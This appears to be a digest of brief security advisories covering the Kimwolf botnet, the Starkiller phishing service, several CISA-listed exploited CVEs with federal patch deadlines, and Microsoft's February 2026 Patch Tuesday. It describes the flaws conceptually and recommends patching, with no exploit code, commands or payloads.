The Kimwolf botnet exploited vulnerabilities in residential proxy services to infect internal network devices, causing widespread DDoS and harassment attacks. The operator, known as Dort, identified as Jacob Butler from Canada, leveraged multiple aliases and cybercrime tools to facilitate account takeovers and retaliatory attacks against researchers. Patching proxy systems and enforcing strict network controls are critical to mitigating this threat.

CVE-2022-20775 is a path traversal vulnerability in Cisco SD-WAN's CLI that allows an authenticated local attacker to bypass access controls and execute arbitrary commands as root. The flaw affects Cisco SD-WAN deployments and carries a CISA KEV remediation deadline of February 27, 2026 for federal agencies. Administrators should apply Cisco's official patches immediately and restrict CLI access to trusted accounts as an interim control.

Starkiller is a phishing-as-a-service platform that proxies victims’ interactions with legitimate login pages to capture credentials and bypass MFA. Delivered by the Jinkusu threat group, it uses Docker-based headless Chrome instances to relay real-time sessions and harvest authentication tokens. This service circumvents traditional detection and lowers the technical bar for cybercriminals.

CVE-2025-68461 is a cross-site scripting vulnerability in Roundcube Webmail caused by inadequate sanitization of the SVG `<animate>` tag. An attacker can deliver a malicious SVG via email to execute arbitrary JavaScript in a victim's authenticated session, enabling session hijacking, credential theft, and unauthorized account actions. CISA requires federal agencies to patch by March 13, 2026; all organizations should upgrade Roundcube immediately and consider blocking SVG rendering as an interim control.

CVE-2021-22175 is an SSRF vulnerability in self-managed GitLab instances that allows authenticated attackers with webhook creation permissions to force the GitLab server to make requests to internal network resources, including databases, admin interfaces, and cloud metadata endpoints. The flaw bypasses network segmentation by using the GitLab server itself as a proxy. CISA has added it to the Known Exploited Vulnerabilities catalog with a federal patch deadline of March 11, 2026.

CVE-2026-22769 affects Dell RecoverPoint for Virtual Machines (RP4VMs) and allows unauthenticated remote attackers to gain root-level OS access using hard-coded credentials embedded in the product. Exploitation requires no user interaction and no valid credentials, giving attackers full control over backup and recovery infrastructure. CISA requires federal agencies to patch by February 21, 2026; all organizations should isolate affected appliances, apply Dell's patch immediately, and audit for existing persistence.

CVE-2020-7796 is an unauthenticated SSRF vulnerability in Synacor Zimbra Collaboration Suite, triggered when the WebEx zimlet is installed and zimlet JSP processing is enabled. Attackers can force the Zimbra server to issue arbitrary internal HTTP requests, enabling access to backend services and cloud metadata endpoints. CISA has added this to its Known Exploited Vulnerabilities catalog with a federal remediation deadline of March 10, 2026.

CVE-2025-40536 is an authentication bypass vulnerability in SolarWinds Web Help Desk that allows unauthenticated remote attackers to access restricted application functionality without credentials. Successful exploitation can lead to data theft, privilege escalation, and lateral movement through connected enterprise systems. CISA has added the flaw to its Known Exploited Vulnerabilities catalog and requires federal agencies to patch by February 15, 2026.

The Kimwolf IoT botnet recently attempted a Sybil attack on the I2P network by flooding it with hundreds of thousands of infected devices, causing severe disruptions. Kimwolf operators use I2P and similar anonymity networks as fallback command and control channels to evade takedown efforts. Detection involves monitoring network anomalies and known IoT malware signatures; removal requires firmware patching and network segmentation.

Microsoft's February 2026 Patch Tuesday addresses over 50 vulnerabilities including six zero-day flaws actively exploited in the wild. Critical fixes affect Windows Shell, MSHTML, Microsoft Word, Remote Desktop Services, Desktop Window Manager, and developer tools such as GitHub Copilot and VS Code. Administrators should urgently apply these patches to prevent privilege escalation, code execution, and denial-of-service attacks.

CVE-2026-21510 is a protection mechanism failure in Microsoft Windows Shell that allows an unauthenticated attacker to bypass security features over a network. CISA has mandated that federal agencies patch by March 3, 2026. Organizations should apply Microsoft's patch immediately upon release and restrict network access to affected systems in the interim.

CVE-2026-21525 is a NULL pointer dereference in the Windows Remote Access Connection Manager (rasman.exe) that allows a local, unauthenticated attacker to crash the service and disrupt VPN and dial-up connectivity. No privileges are required beyond local system access, making the flaw relevant wherever an attacker has an existing foothold. CISA mandates federal agencies patch by 2026-03-03; organizations should apply Microsoft's security update immediately and restrict local access as an interim control.